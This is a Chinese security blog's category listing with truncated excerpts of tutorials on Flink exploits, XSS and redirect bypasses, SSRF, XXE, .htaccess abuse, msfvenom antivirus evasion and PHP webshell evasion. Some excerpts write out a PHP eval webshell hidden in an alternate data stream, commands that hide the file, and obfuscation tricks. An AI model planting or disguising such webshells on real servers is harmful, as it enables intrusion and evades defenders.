Web安全笔记
文章平均质量分 78
WEB安全
XG小刚
这个作者很懒,什么都没留下…
展开
-
漏洞复现-Apache-FLink
作者:小刚一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢本实验仅用于信息防御教学,切勿用于其它用途Apache-FLinkApache-FLink介绍两个漏洞远程代码命令执行利用过程批量测试本地文件读取利用过程Apache-FLink介绍Apache Flink是由Apache软件基金会开发的开源流处理框架,其核心是用Java和Scala编写的分布式流数据流引擎。Flink以数据并行和流水线方式执行任意流数据程序,Flink的流水线运行时系统可以执行批处理和流处理程序。两个漏洞未授权.原创 2021-01-08 14:12:03 · 1395 阅读 · 0 评论 -
XSS bypass姿势
作者:小刚一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢本实验仅用于信息防御教学,切勿用于其它用途XSS bypassXSS bypass姿势闭合标签标签绕过大小写绕过嵌套绕过空字符绕过img标签iframe标签input标签a标签svg标签body编码绕过JS16编码ASCII与UTF-16、Unicode、Hex相互转换String.fromCharCodedata协议字符过滤绕过空格单引号XSS bypass姿势尝试构造xss,突破各种限制闭合标签"><script&.原创 2020-12-24 15:18:05 · 466 阅读 · 0 评论 -
URL重定向-跳转绕过
作者:小刚一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢本实验仅用于信息防御教学,切勿用于其它用途URL重定向-跳转绕过URL重定向一般利用点利用姿势修复URL重定向服务端未对传入的跳转url变量进行检查和控制,可能导致可恶意构造任意一个恶意地址,诱导用户跳转到恶意网站。这个漏洞有啥危害呢????????我们普通人当看到一个网址,发现网站开头是自己熟悉(百度,谷歌)或者某一官网(感觉很安全的网址),就会没防护意识的点入进去,当该网站有url跳转漏洞,就会引导你跳转到一个不安全的网站,.原创 2020-10-15 15:08:03 · 18228 阅读 · 0 评论 -
PHP一句话木马免杀(3)
作者:小刚一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢本实验仅用于信息防御教学,切勿用于其它用途PHP木马免杀小技巧免杀小技巧1.ADS隐藏。2.修改.htaccess文件3.修改php.ini4.一句话拆分小结免杀小技巧1.ADS隐藏。windows数据流有个很好的方式隐藏数据。通过命令行echo ^<?php @eval($_POST['pwd']);?^> > shell.php:123.jpg会在本地生成一个shell.php文件,但打开却发现没有内容.原创 2020-10-14 10:15:29 · 1112 阅读 · 1 评论 -
PHP一句话木马免杀(2)
作者:小刚一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢本实验仅用于信息防御教学,切勿用于其它用途PHP木马免杀小技巧免杀小技巧1.隐藏php文件。2.逻辑判断木马3.数字运算构造木马4.内存木马,也称不死马。小结免杀小技巧1.隐藏php文件。在windows下有个attrib命令,能够帮助我们实现文件的隐藏。atttrib +s +a +h +r shell.php #隐藏atttrib -s -a -h -r shell.php #显示2.逻辑判断木马<? @eval.原创 2020-10-14 09:54:32 · 858 阅读 · 0 评论 -
XXE漏洞-内网探测
作者:小刚一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢本实验仅用于信息防御教学,切勿用于其它用途XXE漏洞-内网探测XXE漏洞危害CTF案例XXE漏洞XXE :Xml External Entity 外部实体注入攻击是利用一种xml的语言进行的注入攻击XXE漏洞原理就不详解了,一搜一大把危害可以读取系统文件获取源代码进行SSRF进行Phar触发反序列化CTF案例本文主要是针对一个CTF题https://buuoj.cn/challenges#[NCTF2019]Tr.原创 2020-08-21 18:33:10 · 2323 阅读 · 1 评论 -
SSRF漏洞-Gopher协议扩展利用
作者:小刚一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢本实验仅用于信息防御教学,切勿用于其它用途Gopher协议扩展利用Gopher协议利用要点利用方式小案例ssrf利用redis写入webshellGopher协议Gopher在HTTP协议前是非常有名的信息查找系统,但是很老了,很少服务会用到它但是!在SSRF漏洞中,它大方光彩,让SSRF漏洞利用更加广泛利用此协议可以对ftp,memchahe,mysql,telnet,redis,等服务进行攻击,并可以构造发送GET,POST.原创 2020-08-20 10:21:04 · 2494 阅读 · 0 评论 -
内网渗透-SSRF漏洞
作者:小刚一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢本实验仅用于信息防御教学,切勿用于其它用途SSRF漏洞SSRF产生原因利用方式小案例1.请求内网资源2.端口扫描3.读取源文件4.Gopher://协议进行扩展攻击5.漏洞组合利用挖掘技巧1.传参方面2.web服务方面3.审计方面防御措施SSRFSSRF服务器端请求伪造,全英文Service_side Request Forgery 一般人也记不住主要利用漏洞来伪造成服务器端发起请求,比如绕过防火墙,进行内网探测,能够突破客户端获.原创 2020-08-19 15:35:21 · 1275 阅读 · 2 评论 -
XFF漏洞利用
作者:小刚一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢本实验仅用于信息防御教学,切勿用于其它用途XFF漏洞X-Forwarded-For(XFF)利用方式1.绕过服务器过滤2.XFF导致sql注入补充X-Forwarded-For(XFF)XFF是header请求头中的一个参数是用来识别通过HTTP代理或负载均衡方式连接到Web服务器的客户端最原始的IP地址的HTTP请求头字段。代表了HTTP的请求端真实的IP。X-Forwarded-For: client1, proxy1, p.原创 2020-08-15 11:15:52 · 8012 阅读 · 1 评论 -
Wfuzz模糊测试工具-能模糊的地方都能模糊
作者:小刚一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢本实验仅用于信息防御教学,切勿用于其它用途Wfuzz模糊测试-URL爆破扫描WFUZZwfuzz参数wfuzz使用方法1、最基本模糊测试路径,文件名,参数值2.过滤显示3.POST请求测试4.指定Cookie5.递归扫描目录总结WFUZZwfuzz是用python开发的针对web的模糊测试工具,该工具实现功能相当于burp的爆破模块,可以自定义指定参数进行爆破测试。该工具在kali中已经安装并直接使用也可以用pip安装wfuzz.原创 2020-08-04 17:39:36 · 2879 阅读 · 0 评论 -
PHP一句话木马免杀
作者:小刚一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢本实验仅用于信息防御教学,切勿用于其它用途PHP木马免杀小技巧免杀小技巧1.字符串拼接方式,构造敏感函数。2.通过PHP的动态函数方法执行一句话。3.利用php异或^构造字符串免杀木马构造一句话测试异或转码数据免杀小技巧1.字符串拼接方式,构造敏感函数。<?php$a = 'ass';$b = 'er';$c = 't';$d = $a.$b.$c; //assert2.通过PHP的动态函数方法执行一句话。<.原创 2020-07-26 19:54:56 · 6507 阅读 · 4 评论 -
Apache服务器.htaccess利用
作者:小刚一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢本实验仅用于信息防御教学,切勿用于其它用途Apache服务器.htaccess利用了解.htaccess利用方式实现效果1.改变文件解码方式2.源码公开3.文件包含与代码执行4.远程文件包含与代码执行5.UTF-7编码实现XSS和PHP代码执行6.通过错误消息链接进行XSS总结了解.htaccess.htaccess文件是Apache的一个配置文件(没有文件名,只有一个后缀),他是改变某一目录单独的配置。通过htaccess文件,可.原创 2020-07-22 17:55:16 · 626 阅读 · 0 评论 -
html+css小名片代码
作者:小刚一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢本实验仅用于信息防御教学,切勿用于它用途HTML+css小名片效果效果图小名片代码学习html+css时做的小名片案例。效果图鼠标移动到名片前鼠标移动到名片后小名片代码<!doctype html><html><head><meta charset="utf-8"><title>Document</title><link href="h.原创 2020-05-21 15:15:58 · 4618 阅读 · 1 评论 -
msfvenom制作360,腾讯免杀木马
介绍msfvenom是用来制作msf所支持的木马文件的,在这介绍一下msfvenom的几个使用参数,和如何制作免杀木马。主要过程就是使用msfvenom指定特定编码,编码次数等生成c语言代码,再使用==VC++==生成程序文件。msfvenom参数这里列出几个常用参数,其他参数可使用help查看。-p指定所使用的payload-e指定使用的编码器-b删除无效字符-i指定编码次数-f指定生成的文件类型-l列出可使用的项-o导出为某文件原创 2020-05-19 15:37:27 · 3994 阅读 · 13 评论 -
正则表达式--大集合
作者:小刚一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢本实验仅用于信息防御教学,切勿用于它用途正则表达式一,校验数字二,校验字符三,常用规则网络上收集的各种正则表达式大杂烩,亲测有效。有啥好的正则表达可以在评论区评论哦。一,校验数字数字^[0-9]*$n位的数字^\d{n}$至少n位的数字^\d{n,}$m-n位的数字^\d{m,n}$零和非零开头的数字^(0|[1-9][0-9]*)$非零开头的最多带两位小数的数字^([1-9].原创 2020-05-09 18:55:55 · 413 阅读 · 0 评论 -
web扫描姿势——xray被动扫描
作者:小刚一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢本实验仅用于信息防御教学,切勿用于它用途web扫描技巧web扫描新姿势:被动扫描passive-scan-client介绍xray扫描器xray和passive-scan-client组合使用总结web扫描新姿势:被动扫描通常我们在进行web扫描漏洞时候,都是使用各种扫描器输入网址乱扫一通。这种方式虽然大众化,但存在许许多多...原创 2020-05-03 18:50:23 · 110911 阅读 · 1 评论 -
hash破解-hashcat
hashcat破解hash值自己搭建实验环境:1.了解hashcat2.了解JohnTheRipper3.了解zip试验步骤:今天分享一个称之为世界上最快的密码破解工具hashcat在渗透测试中我们经常会碰到一些加密处理的一串hash,有的在线的网站可能无法解密,我们就可以hashcat进行密码恢复。今天使用JohnTheRipper中的zip2john.exe对加密zip获取哈希值,使用h...原创 2020-05-13 13:09:10 · 13827 阅读 · 6 评论 -
验证码爆破绕过
一,验证码目的:区分用户是计算机和人证明自己的身份,手机短信验证码,微信登录等大多数的网站都会在很多地方设置各种验证码.防止而已破解密码,刷票等,防止黑客对某一个特定的注册用户进行爆破。二,验证码种类:传统字符验证码:由数字或者汉字组成的图片,通过添加各种噪点增加识别难度,可通过OCR技术进行破解当验证码只有4位,可直接爆破数字验证码。如果是6位,在半小时内无限制提交也可以暴力破...原创 2020-04-02 12:11:00 · 8447 阅读 · 1 评论 -
GNS3镜像网盘
学习使用GNS3用到的各种镜像Cisco IOS路由器:链接:https://pan.baidu.com/s/1hfhtuEfrU8v6P-3Pa7SOfA提取码:aeziCisco IOU:链接:https://pan.baidu.com/s/1YNLQIqE1fNGLxFkIJAwynA提取码:v9srCisco ASA\ASAv:链接:https://pan.baidu.co...原创 2020-02-23 12:13:41 · 8613 阅读 · 5 评论 -
HTTP协议
**超文本传输协议**无状态协议对事物没有记忆功能支持C/S支持客户端/服务器模式URL:固定格式 http://host[":"port][abs_path资源路径]在TLS,SSL之上http80 https443请求和响应GET,POST,HEAD,PUT,DELETE,TRACE,CONNECT,OPTIONS响应:1指示信息2成功 2003重定向4客户...原创 2020-03-17 09:21:45 · 249 阅读 · 0 评论